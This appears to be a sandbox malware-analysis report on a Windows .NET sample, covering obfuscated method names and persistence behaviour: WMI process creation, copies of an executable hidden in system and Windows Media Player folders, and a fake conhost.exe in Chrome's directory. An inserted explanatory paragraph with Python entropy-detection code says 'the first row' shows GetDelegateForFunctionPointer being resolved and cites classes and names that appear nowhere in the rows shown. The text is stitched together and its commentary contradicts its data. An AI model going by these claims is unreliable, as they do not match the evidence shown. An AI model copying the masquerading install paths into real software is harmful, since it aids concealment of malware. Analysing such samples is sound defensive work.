                           Source: 3XtEci4Mmo.exe, rb9ArvbAexNZHofw021.cs | High entropy of concatenated method names: 'uShb6IYdiI', '_64r', '_69F', '_478', 'iqHbX8UjK8', '_4D8', 'sJibfqn51E', 'DSLbtBoSKX', '_4qr', 'dcibKJjj1X'
                           Source: 3XtEci4Mmo.exe, SbeA6rOeDeQJfX2QIy8.cs | High entropy of concatenated method names: 'jeXOxwpPrm', 'VlmONk4SpY', 'Fw35ZW5uL2asN4fJcyWc', 'doBBxY5uPQtRI8VWFNQM', 'cOxNDG5ugrHOGyi20dGx', 'kLrK7s5u1AgutKDt8lap', 'Cw1d5l6vK4', 'lsW9K95uUToGDD8ISfMR', 'jAHS1q5uJtdoo62pi3Aq', 'SRTarT5u3FHwPess9SLC'
                           Source: 3XtEci4Mmo.exe, brHKGOrRZuFBrRPAP49.cs | High entropy of concatenated method names: 'iHJr4fn5Ks', 'OHlrIvgdBc', 'tFerWNLu11', 'AYprHlyIus', 'CVMrm2hsva', 'JjVrwLfSPk', 'zpfrjUNe5I', 'GnIr87MC00', 'KLVrsCpqce', 'D2druDMUhc'
                           Source: 3XtEci4Mmo.exe, ljIJl85KNKg0uXqkOny.cs | High entropy of concatenated method names: 'Gd950Fh5V4', 'hXk5rGunPQ', 'kM25BDaZlR', 'tiMZMi5mURsW9EA3SdER', 'u2fWRa5mJ6SFvS7p0WXF', 'a6X5Xa5m3sOJjynPEONE', 'rgrXWw5miUtT2xuBWJDU', 'ub2uwC5m4GqonuNTtW8g', 'uoG4c85mel08yG3ZdI7u'
                           Source: 3XtEci4Mmo.exe, NDD5xTtU1v84q4QF8yW.cs | High entropy of concatenated method names: 'qX6t4M3Bpj', 'LOHteTAwpd', 'JjptYrRN92', 'yVVtS9KVJc', 'rfbtZUm62T', 'oiOBkZ51aaRgbbK0BmfR', 'C8WZAA5LCy8dsQcBB56a', 'NOoDZA5LzMUiVJIxFw5f', 'U5VgPq515IepBTdmMxcB', 'zFuwPm51pYQRg7KbDwla'
                           Source: 3XtEci4Mmo.exe, Y39TNB5H0FBcOapU0dj.cs | High entropy of concatenated method names: 'N2T', 'V29', 'o75', '_2Q4', 'K3B', 'aUT5A0aMKND', 'CYD5VZdZcft', 'leu1CS5mNRCXPO3WHMOw', 'aQKAv15mCLnMoUIfNEl0', 'tm7wOd5mzSFZeOuW4iFL'
                           Source: 3XtEci4Mmo.exe, V13rd7NUjstUZRJDksB.cs | High entropy of concatenated method names: 'vtu5dYuKvqF', 'PL65dSwaJRB', 'jti5dZ1XZeE', 'ApJ5dhErKr8', 'NW45dGb6RG1', 'T3L5dMM2yR1', 'pA45dv3rHyE', 'OgqCy6semB', 'Hk85d2ovF3T', 'gXf5dTKIuc4'
                           Source: 3XtEci4Mmo.exe, CSVlJtyUcINMqWIoH87.cs | High entropy of concatenated method names: 'IDV', 'd65', 'T2y5AwCTnqI', 'Xun5DaxnNBd', 'Im3y40AukC', 'ygCDTB5PqBGKprASfFo1', 'yEJ63i5PRIGsFsJGNlei', 'QC3IsU5PnEpnIEJxOv8w', 'zOmT2u5PIq724tiJnUjF', 'ge67Le5PWvem1PJLJSbR'
                           Source: 3XtEci4Mmo.exe, YeKnSFkRBUbJHF9LetR.cs | High entropy of concatenated method names: 'sQrE0UxZLW', 'Ylnu3S5ZSwRYhIf0DeA7', 'fI4lc65Zepf3n7b0UNTa', 'h53uD85ZYsCewKp8wsVB', 'XDpBKk5ZZfcNttDyfTBg', 'i5X', 'NcTkINBqh9', 'W93', 'L67', '_2PR'
                           Source: 3XtEci4Mmo.exe, fNfLaE0zI2qySFfaDvO.cs | High entropy of concatenated method names: '_26K', '_1U7', '_5gR', '_58D', 'H8v', 'WWlr55uimG', 'eRgrpsmHRd', 'gY2', 'rV4', '_28E'
                           Source: 3XtEci4Mmo.exe, gdtUikMCYNnWjPOelGL.cs | High entropy of concatenated method names: 'JtIvpIcbPm', 'r1PvVEpwdG', 'XMBZdP5xsssGYgmSug07', 'L7OxBw5xuFXmDCIQPmBH', 'rB7i2E5xj5Ywrk3s7FiN', 'qqp0gH5x8ZAhYkoNqAne', 'cyFBJo5xkUlAT9KYQ1oX', 'ED2Pbt5xEhiC2U5eurtK', 'x2cva6VslS', 'xOhfmG5xHgPVaWgmBI38'
                           Source: 3XtEci4Mmo.exe, b9X1yycvmlPoNq4YwTc.cs | High entropy of concatenated method names: '_5Z7', '_58k', '_4x4', 'bU6', '_3t4', 'a5C', 'JUA77K5E3fIYeQ9xW9yA', 'wTSJNa5EUUnCwkwDeJpk', 'i6wTrS5EiadY8sgHJZ8D', 'YspcT6g8qb'
                           Source: 3XtEci4Mmo.exe, i8vMTkjFk8BjGrWUruO.cs | High entropy of concatenated method names: 'RcmjRlSjKY', 'kkIjnw6sbe', 'M62', '_1Xu', 'LuR', '_4p3', 'HVh', 'UfTjIfaKFM', '_96S', '_9s5'
                           Source: 3XtEci4Mmo.exe, dU0gkHp8oTPK7gX8Jgd.cs | High entropy of concatenated method names: 'vmtp9b7bfh', 'evAbWK5j7W1D4E2YdAS7', 'sCo2fB5jBhoUhQMf35iX', 'jEyqt05jlfgmvxVQNeEC', 'Wu7nSH5jQLf32iLhJigs', 'cyjpuYOGdC', 'IoPpkQNjLu', 'yucpERd2ni', 'hVhpblWTSF', 'JhO7Ly5jXR54cIOtFD7t'
                           Source: 3XtEci4Mmo.exe, D0YXPv8VpTedp7SMeWN.cs | High entropy of concatenated method names: 'x6C8OpvtsB', 'PR48dXX7GQ', '_7Bm', 'gNe8cY4uKh', 'KY38AioQl0', 'FKM8yoOGb9', 'suw86mnxtE', 'jc1kxu5YEe7Nx7s0YBNh', 'xQQZdn5YbhlJHr9rc8WR', 'vjFSQc5YPb7lq48WrxDs'
                           Source: 3XtEci4Mmo.exe, yhAAX56icX6HAqMQgTg.cs | High entropy of concatenated method names: '_34V', 'y7u', 'Xxj5ALqbEVo', 'T4m6eJ9BId', 'gt1', 'QbHfxa5gkhSf7gu0n654', 'DTHQYr5gsFQexb3SN0IA', 'GvcxrS5gu2PBv9VKCxmW', 'XCSMxX5gEJnppU96r4VE', 'FtBOmE5gbRsdaqEUmE2A'
                           Source: 3XtEci4Mmo.exe, t7y0YlShpwpkKkfFWtc.cs | High entropy of concatenated method names: 'PROSMG42tX', 'i1ISvB2oUV', 'ooIS2gR6Du', 'NyLSTwpyYf', 'ubhSxU27BM', 'H6aSNrUkWg', 'TeGSCvTZVL', 'vQiSzNaoZ2', 'WwaZaABuTk', 'htpZ5UoSjS'
                           Source: 3XtEci4Mmo.exe, q5km0q8gEjVRaq6Ukfd.cs | High entropy of concatenated method names: 'HqX81IXv21', 'iLi89XpKKU', 'a3R8Jqxn2y', 'EW683xRir5', 'Qql8UWWZ6D', 'nEIioj5S7E6ryfcv8pqE', 'sxb7A65SQSTTXpJsWosV', 'glPRKD5SFnvJ9bgGdAOq', 'lGGKkd5SB00lYn9ElUcV', 'T5gplw5SlNMBDwreui9U'
                           Source: 3XtEci4Mmo.exe, mBGA4WLQBRwF5t0TP0v.cs | High entropy of concatenated method names: 'j14UvY5M8xgaaeHImHwb', 'I7Oe4v5Mw6b3AYk7xI9c', 'K4dK6Q5MjJK7Bvf8pN3f', 'e69cex5MIRiBEiGhvIAR', 'DnoLkM5MWtFsPKlO6JBS', 'l6PN7b5MH4O4IXtBBDXx', 'AlpuG55MRZI848WePJqD', 'HgrXkI5MncVZruoA5d71'
                           Source: 3XtEci4Mmo.exe, kF6XgludTPm0j2QyyMh.cs | High entropy of concatenated method names: 'gugUG85Zw5uXtDB4HupC', 'MhXqAX5ZjenSWbpyUaZX', 'Tn5SjI5Z8xZoCO1CDQUL', 'go2uAxSiu9', '_1R8', '_3eK', 'Cvxuype6RQ', 'SIau6enlsW', 'FNGuX94BwU', 'pLAuffsSOm'
                           Source: 3XtEci4Mmo.exe, oZYRFMZhkE9GpIp6qkM.cs | High entropy of concatenated method names: 'ktr5A4M2ofS', 'H1KZMcAHfw', 'XuyZveOgWG', 'mxnZ20Xhp9', 'LH1tCC5vHejEyJOmPyfR', 'DloQVt5vmT5rgkU8AvUt', 'Usju1b5vwin0udXRuphZ', 'AnPPDn5vj5eJOG1UKIQy', 'Qee7NC5v80mlZ7NuUv7S', 'q02TbT5vsOeyJRm4y1eA'
                           Source: 3XtEci4Mmo.exe, l3hDFap7Qgb0LsGUNsw.cs | High entropy of concatenated method names: 'xD6pFFLdb9', 'qnvpqSdWkc', 'J6kUMN5jV3UqxciqcgQW', 'uoebHK5j5eDKX8USqvJe', 'CAHBg55jpYi2yrfMZInQ', 'wPQ52a5jDNx7oVCk4bwQ', 'ghE6J05jObRDGPkh7cx2', 'brXKkE5jdQ5FxKbiYKyL', 'vgGRV15jc7lDGG8P8bx0'
                           Source: 3XtEci4Mmo.exe, XLIn7vXqk0V4LZH8oiD.cs | High entropy of concatenated method names: 'Np6XndSTTO', 'nciXIUVFl2', 'fYrXWi8mfR', 'dh2SgA5LFeOP5V7swfsK', 'nk2tqQ5L7SgWdqT2IlCQ', 'UyG0W45LQZsiu5m160wO', 'pNkQYG5LqyFbnmn2jHLS', 'a79X165LRZkvIY84Kh5a'
                           Source: 3XtEci4Mmo.exe, tPqxrngJalv5aGYnGH0.cs | High entropy of concatenated method names: 'KbdgUQ8L63', 'WFWgiYpu25', 'dpCg4yQEJO', 'arWge7E1wk', 'VSVgYvtETL', 'kIVgSaGN6M', 'QaIgZALOcJ', 'OsYghMdkWo', 'sXEgG0pk6H', 'EBrgMTZ1Yr'
                           Source: 3XtEci4Mmo.exe, Xsl8b9BpKQUglufWkHL.cs | High entropy of concatenated method names: 'Yu1BB0w9nK', 'TqrB7w0Rbd', 'fUsBDVnrrW', 'gCLBOjVXIQ', 'DlsBdmiWW0', 'l0HBcovaT6', 'B5mBA4uBIy', 'QLRByfjmm2', 'bcUB6ZJfTL', 'tWiBXJg0pD'
                           Source: 3XtEci4Mmo.exe, s08bGFV6rL8qQcpH8lx.cs | High entropy of concatenated method names: 'x4ZVfpCTX3', 'W8TVt4OCik', 'EKSVKNhKAe', 'ieUw2T5jGPHSfLR7iPRs', 'AKyG6U5jMJ8wXeCWgsIj', 'ByutWE5jZbMmRVu7luls', 'ArFvrW5jhl61O61TYKZt', 'Vk68Py5jvNRNPHUOLSrp', 'UdUloh5j2jwc6QIq2uve', 'ogEWPY5jTPRflABqgoOR'
                           Source: 3XtEci4Mmo.exe, E5nuhORPK26ehrobi7G.cs | High entropy of concatenated method names: 'fhVmWhxDjw', 'rNDmH8P2gH', 'jXoJVP54wWtVKttQFkTj', 'Mwt1rO54HQbp2W2QyHSc', 'vkwdhE54mpIk7pq3c1F2', 'DQvwWO54jFvF0Trd9CO5', 'lybNdM548CPfqyRsvMPn', 'XkymuSmlem', 'eGe2jc54Ev2Se9BAE30R', 'fhxNQI54uBJyt2lUDHPS'
                           Source: 3XtEci4Mmo.exe, nfGD2cdcn7Qr7srILIp.cs | High entropy of concatenated method names: 'eGJdQxPidg', 'IKkdFNjjdX', 'EahYTq5kOcH5jJWa0Cox', 'qYWNbo5kVaxBenLqlSXT', 'Wvsvtx5kDSDZiDbQUtIL', 'DySbEe5kdP9Dg0tteiOk', 'uZxdBtvFcB', 'oJEdl32udc', 'DJKxEF5kabAZGpFOt45N', 'i3ABR65uCRP1xwi7Ygkh'
                           Source: 3XtEci4Mmo.exe, aFNsOOvfK8BbTEgAgLp.cs | High entropy of concatenated method names: 'FCOvKyOdG5', 'lU4voCtNgF', 'LMtv0SG0OM', 'P8mvrjdiQV', 'DrpvBLy1fy', 'JV8vlly9YP', 'uvRSZP5x3f0XJ2VbZLwO', 'YGVXRO5xUvQxE0DBHBTb', 'zdrpCR5xiGs1QUMu0VBV', 'qiUVV75x4naFX7kLXAvH'
                           Source: 3XtEci4Mmo.exe, hfliQdD9Fko5UK7RNgE.cs | High entropy of concatenated method names: 'lT5DSEo2j9', 'giMCQX5s3JiAV0pSjGL4', 'Llo4Is5s9PA4QcDFNIUE', 'zKipK85sJq02OJLtDhG5', 'vq8D3yHefL', 'hVjDU31Lwx', 'VrDDiRS2RT', 'BCiV4S5sPAF7t4pAX9x3', 'N7xbrE5sgJ02aGeEYv58', 'OXaRgn5sEosctBaEs1ZC'
                           Source: 3XtEci4Mmo.exe, fVrei9DbbYK51gqX9F7.cs | High entropy of concatenated method names: 'u9fDgGjbR8', 'IiiDLGuXv3', 'vi0tCy5swgdPHWYEIXiY', 'ucJQBt5sHMdj6IPn9xXQ', 'sps8Qk5smFBWCJFnwTHR', 'wHaOKu5sjhOS6p3mYHRc', 'e5ChTZ5s81p0QftVBn52', 'Yxwotg5ssmeLMW7vbdbq', 'hDTkWI5suKstrLbnRTc9'
                           Source: 3XtEci4Mmo.exe, SDjHkmys5LI5U0oZE4r.cs | High entropy of concatenated method names: 'juSy97bqOL', 'nYNuSN5PlANmG3XQZ8DT', 'yknBGt5Pr2Je6LjfiogD', 'mFKunK5PB3bMQv7IwfRR', 'TYOHei5P7ggaGxr6JAOZ', 'nqjdv55PQndSNTrua8rC', 'UU8', 'd65', 'AAM5DKGjmdv', 'DS95Do0qs65'
                           Source: 3XtEci4Mmo.exe, asA0OvGDDNsByyUxtuK.cs | High entropy of concatenated method names: 'ViQGdlXuDC', 'gpYGccC7rx', 'FcDGAsHGaZ', 'FqtGy5l304', '_0023Nn', 'Dispose', 'mMT8oW52vibDDse2pn0l', 'osJWVZ52Gbs4jRiASvnr', 'KC3qQj52MbjUkCfn1pGf', 'dAZfob522FaFs1YNOKlZ'
                           Source: 3XtEci4Mmo.exe, F5vhKUwGHbUt17hYG7Q.cs | High entropy of concatenated method names: 'Xaawvglh07', 'EpAw2vCm1T', 'C7xwTVopvo', 'NL7wx0oSsw', 'x5AwNnc0RQ', 'ssUwC4aQkM', 'kprwzkIi1S', 'RfXjaCsC4H', 'Ytqj5sBaSS', 'VRMjplUm4N'
                           Source: 3XtEci4Mmo.exe, m07ytYGtXWB3pfhpDEw.cs | High entropy of concatenated method names: 'ENX5dgXsZN4', 'DR75dLhj8f2', 'vLO5d1jRKdf', 'rVV1sg5TjqBhrSEENHPE', 'K7JQMX5TmrC4JwLuKb99', 'Pg0vKr5Twxq6mncMJl7b', 'mrfp3m5T8NOrxDk4HLe2', 'zpb5AecVaEQ', 'DR75dLhj8f2', 'l1Kmqw5TERXdQOj47EIM'
                           Source: 3XtEci4Mmo.exe, FAD6y0Xdfe4MBir2is1.cs | High entropy of concatenated method names: 'MwD7xS5LrKagr5WenBJS', 'N9aMrK5LBHW6bS41MuAo', 'q42aHI5LopjFowq2RZeL', 'w2QlrU5L072vrWv8iFiG', '_7kT', '_376', 'unRXASP8X2', 'ycEXyxqkMt', '_4p5', 'iR2X62FIZ3'
                           Source: 3XtEci4Mmo.exe, cyNuh1yzG8uZcwFXgYU.cs | High entropy of concatenated method names: 'tGK6dghZ1y', 'zXK8n55PiAtbAuJScvZQ', 'eXR3dP5P3pRbCfqmnJug', 'aWZThH5PUPml3OCycNvs', 'mlsPTL5P4n4oKWIpaaGo', 'eq7', 'd65', 'Em85DFZuEWJ', 'GZ45DqdS7RB', 'Plt5AskuhoP'
                           Source: 3XtEci4Mmo.exe, jRc4nXglZYDTnODofYb.cs | High entropy of concatenated method names: 'sgSgQ7F7CB', 'CMFgFYN3Pr', 'TQwgqUrkQe', 's24gRVrkJK', 'QrggnwfEvo', 'ReNgICjXLT', 'JAWgWhUEup', 'TF0gHvZQnm', 'BaagmIxcfd', 'x83gwSIQW7'
                           Source: 3XtEci4Mmo.exe, hHOVqk5YEU4MawvCC36.cs | High entropy of concatenated method names: '_413', 'V29', '_351', '_2Q4', 'H7R', 'g085AlYwbTn', 'CYD5VZdZcft', 'ch3AQX5wREiwEaqOES7M', 'qFewap5wnkDgWGNa1TUo', 'LG4pxH5wI95xZBMa7Nig'
                           Source: 3XtEci4Mmo.exe, QCySVEdiWkU3blmMX9X.cs | High entropy of concatenated method names: 'wqWcaMbrf1', 'Wf9c5uxBvb', 'GKacpyqIwJ', 'VPQI4g5kv7slDCNAmfGL', 'wY2TrJ5kG2GtXNo3PowJ', 'db47GO5kM2GQUNvMAdYw', 'v4UM885k22ekL2hjTt7n', 'Bgxdev6f6D', 'sQCdYEgBEf', 'juEdSM1EGQ'
                           Source: 3XtEci4Mmo.exe, sgAVbbDhtyYTBCw1jW0.cs | High entropy of concatenated method names: 'GFeDNWDi66', 'hInDCwfK2M', 'pPiDzQBwJW', 'hluoKf5sh6jd8TywANee', 'XolcC65sGd5DOMt6hTkH', 'iMPfSt5sSm0ob5vKRBws', 'lKu6ZJ5sZUijrt6Hh0TP', 'ukSDMxSJyw', 'DIqDvK2TYL', 'J5VD2H1Yvc'
                           Source: 3XtEci4Mmo.exe, CQajfxAYkA8eMvQ1Ymy.cs | High entropy of concatenated method names: 'QQwAvgefdv', 'RtsA2vnyIe', 'GIwATK9rSl', 'PL4Axi1AA0', 'xVWANZkKZT', 'OrbACJ2GsK', 'OixAz35oHX', 'MPHDse5bug8RCubvhrPn', 'otp5BO5bkltVduODkLwi', 'G1QNOH5b8TapUhvdVlvq'
                           Source: 3XtEci4Mmo.exe, YSVUuphWulIitZbBJEM.cs | High entropy of concatenated method names: 'Xyb', 'Sz4', 'zej', 'EkVhmMyDIB', 'aVDbvO52RyQ522Vf45NG', 'ITWmxL52nW5ed8nEkFRx', 'cBbe0C52IHsPUK431Buh', 'FqppfN52WZnjjQGVukaD', 'pd8NuE52HAIgklUBHARN', 'rm82UA52mOKwGqdcQ9Yq'
                           Source: 3XtEci4Mmo.exe, YJwkLXcn20QsXM7ClFh.cs | High entropy of concatenated method names: 'UcLc8NsRTv', 'HEZwhC5E72Kt9FYIoEEb', 'hLOMQC5EQVx4bf7ESnZD', 'BWS0il5EBUmCCwJ0MqZ2', 'AHQkO95El1aWd6gZnZPF', 'E39cW3KK95', 'rW2ftY5EtBPS1cudMD3H', 'ztanhE5EXMHal233fDMs', 'ChIjQ65EfXFiQl8Yx4Rc', 'C6SH8L5EK5iiKCgODMq7'
                           Source: 3XtEci4Mmo.exe, yR56RW6L2tdX3w6ffRQ.cs | High entropy of concatenated method names: '_2SY', 'zwM5APpik7K', 'OZp69Rtg7p', 'E5A5AgEpVle', 'RutIte5gItLBJcZNixFf', 'zkp4gm5gW9dlQhqdMM8k', 'zcAUeQ5gR2Ujj62ZKW39', 'zQU0ur5gnA7Mif2jmgME', 'RFgVWa5gHTveYQ5IkQhv', 'tmoXwG5gmRMuN490lOE1'
                           Source: 3XtEci4Mmo.exe, OC926awQ1HB6XDjlaeZ.cs | High entropy of concatenated method names: 'DFCwqtkGYm', 'ohOwRjmkjf', 'CcMwnRLZb1', 'fZhwIpY04X', 's2JwWWwdOv', 'fSkwHoSmgl', 'OlKTnS5eoPTGg0SLhgOC', 'NjZHTx5etZ3xHjvocRYH', 'WPusv05eKV8UryBDIT8W', 'IV6Ujl5e0J96fliv0ZAb'
                           Source: 3XtEci4Mmo.exe, pCP37MhTpTvIE9CqaM9.cs | High entropy of concatenated method names: '_7as', 'dxy', '_8Kv', 'TYThNDlFZv', 'GbxhC3kCtO', 'Jjfhz81EP8', '_0023Nn', 'Dispose', 'fnxsk5524hHhjl17Xngl', 'PM23hV52eqNeEM0x6b4B'
                           Source: 3XtEci4Mmo.exe, r8fuc6TFjfWnUBPl3d1.cs | High entropy of concatenated method names: 'v4xPgF5NFW44T0RhoVEK', 'wGffMM5NqpXJqEOprG8T', 'fNKxx9Hqt0', 'KmiucI5NWpmWkJ2iZ8DF', 'RTJ9Mw5NH1kNIoKvOLa2', 'dvaiMu5NmIkhxuSUoDHD', 'nXcRcW5Nww7LsM6MnKPw', 'POubny5NjXXHmpwhQpTA', 'DoBmDJ5N87PlZOE7l4qY', 'GF5d0F5Ns0WNYd7fy7f1'
                           Source: 3XtEci4Mmo.exe, DKZcf0Nqhvbh4r4fMkI.cs | High entropy of concatenated method names: 'oXJNk60gtv', 'rBeNElAw47', 'ns5NbaYuE5', 'Y5fNPa9HKT', 'sWdNg7DZ4r', 'FKINLCbJxa', 'KQYN1cwcT8', 'CsVN9kjue5', 'unkNJpDPM4', 'wvSN3E06f1'
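The "High entropy of concatenated method names" rows above are a renaming-obfuscator signal: the .NET classes in this sample carry method names like 'KsmdhP5Ekkp8C9fRkrPx' rather than anything a developer would type, and the first row shows why that matters, since the code resolves GetDelegateForFunctionPointer through reflection rather than calling it by name. The following is an added example, not Joe Sandbox's detection code: it computes the Shannon entropy of a class's concatenated method names, as the heuristic does, and compares the names listed for XDuT18ckg7mOHRs8nmK.cs against a constructed set of ordinary names. The 4.8 bit/char threshold and the control names are assumptions for the example.

```python
"""Shannon entropy of concatenated .NET method names.

Added example; not Joe Sandbox's code. Renaming obfuscators replace method
names with random alphanumeric strings, and the per-character entropy of
all of a class's method names joined together separates those from names a
developer wrote. The threshold below is an assumption.
"""
import math
import re
from collections import Counter

# Assumed cutoff in bits per character (max for 62 alphanumerics is ~5.95).
ENTROPY_THRESHOLD = 4.8


def shannon_entropy(text: str) -> float:
    """Bits per character of the empirical symbol distribution of `text`."""
    if not text:
        return 0.0
    n = len(text)
    return -sum((c / n) * math.log2(c / n) for c in Counter(text).values())


def method_name_entropy(names) -> float:
    """The heuristic scores the names concatenated, not one by one, so short
    names like 'h65' contribute to the same pool as long ones."""
    return shannon_entropy("".join(names))


def is_obfuscated(names, threshold=ENTROPY_THRESHOLD) -> bool:
    return method_name_entropy(names) >= threshold


def names_from_report_line(line: str):
    """Pull the single-quoted method names out of a report row like those above."""
    return re.findall(r"'([^']*)'", line)


# Constructed from the XDuT18ckg7mOHRs8nmK.cs row of this report.
REPORT_LINE = (
    "Source: 3XtEci4Mmo.exe, XDuT18ckg7mOHRs8nmK.cs | High entropy of "
    "concatenated method names: 'NREce5kXOc', 'cBqcYomYh8', 'OXlcSawN7A', "
    "'KsmdhP5Ekkp8C9fRkrPx', 'vgP9Ts5EEVN91bPLlOjO', 'YBrlGh5Es8MLiiwtXODb', "
    "'aeO7Wb5EudG2iEP8K3ZM', 'f9DcboHr3f', 'WsUcPfDnGf', 'l18cgoImaW'"
)
OBFUSCATED = names_from_report_line(REPORT_LINE)

# Constructed control: names a developer would plausibly give a network client.
READABLE = ["GetConfig", "LoadSettings", "SaveSettings", "ConnectToServer",
            "SendHeartbeat", "ReadResponse", "WriteLog", "Dispose"]

if __name__ == "__main__":
    for label, names in (("obfuscated", OBFUSCATED), ("readable", READABLE)):
        print(f"{label:10s} {method_name_entropy(names):.2f} bits/char "
              f"flagged={is_obfuscated(names)}")
```

The obfuscated set scores around 5.5 bits per character, the readable control around 4.1. Camel-cased English already sits near 4 bits, so the gap is real but not huge; rows in this report with only a handful of three-character names ('_25r', 'h65', 'AWD') give a noisy estimate from some 30 characters, which is why the sandbox reports this as one signature among many rather than a verdict on its own.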

                          Persistence and Installation Behavior

                           Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (listed 15 times in the original report)
                           Source: C:\Windows\System32\cmd.exe | Executable created and started: C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe
                           Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | File created: C:\Users\user\Desktop\ucDhZRLu.log
                           Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | File created: C:\Users\user\Desktop\qwPLRqWX.log
                           Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | File created: C:\Users\user\Desktop\ThILVSlx.log
                           Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | File created: C:\Users\user\Desktop\FAtHPtxq.log
                           Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | File created: C:\Users\user\Desktop\ZrGvzZJn.log
                           Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | File created: C:\Users\user\Desktop\QWdyfgGf.log
                           Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | File created: C:\Users\user\Desktop\udiCoAET.log
                           Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | File created: C:\Users\user\Desktop\QXRfkjyW.log
                           Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | File created: C:\Users\user\Desktop\dVnCFeff.log
                           Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | File created: C:\Program Files\Google\Chrome\Application\conhost.exe
                           Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | File created: C:\Users\user\Desktop\wFqSLbvP.log
                           Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | File created: C:\Users\user\Desktop\xLpaQOdH.log
                           Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | File created: C:\Users\user\Desktop\tmGCYmXQ.log
                           Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | File created: C:\Users\user\Desktop\zhcyQjUk.log
                           Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | File created: C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe
                           Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | File created: C:\Users\user\Desktop\rmNqRUKB.log
                           Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | File created: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                           Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | File created: C:\Users\user\Desktop\bQGwUejE.log
                           Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | File created: C:\Users\user\Desktop\QImfPxDF.log
                           Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | File created: C:\Users\user\Desktop\BargBgFj.log
                           Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | File created: C:\Users\user\Desktop\bcXTThuh.log
                           Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | File created: C:\Users\user\Desktop\LBbeHZkL.log
                           Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | File created: C:\Users\user\Desktop\WBPEscIu.log
                           Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | File created: C:\Users\user\Desktop\sTDIJUfq.log
                           Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | File created: C:\Users\user\Desktop\XQlMiBJi.log
                           Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | File created: C:\Users\user\Desktop\EVQZcBiW.log
                           Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | File created: C:\Users\user\Desktop\sRYTiegb.log
                           Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | File created: C:\Users\user\Desktop\LCxGrujI.log
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\TfOoGCsS.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\rNFADhxz.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\OlTNIjCM.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\WgiUHyMw.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\jGLeSKCo.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\VkvurCps.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\Zallyypm.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\yUQAQjKk.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\pKSShysD.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\kOdTVPKT.logJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exeJump to dropped file
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\KVHoAvPS.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\HDgqkcCm.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\FizIvULx.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\QujYzohZ.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile created: C:\Users\user\Desktop\npJJQJjz.logJump to dropped file
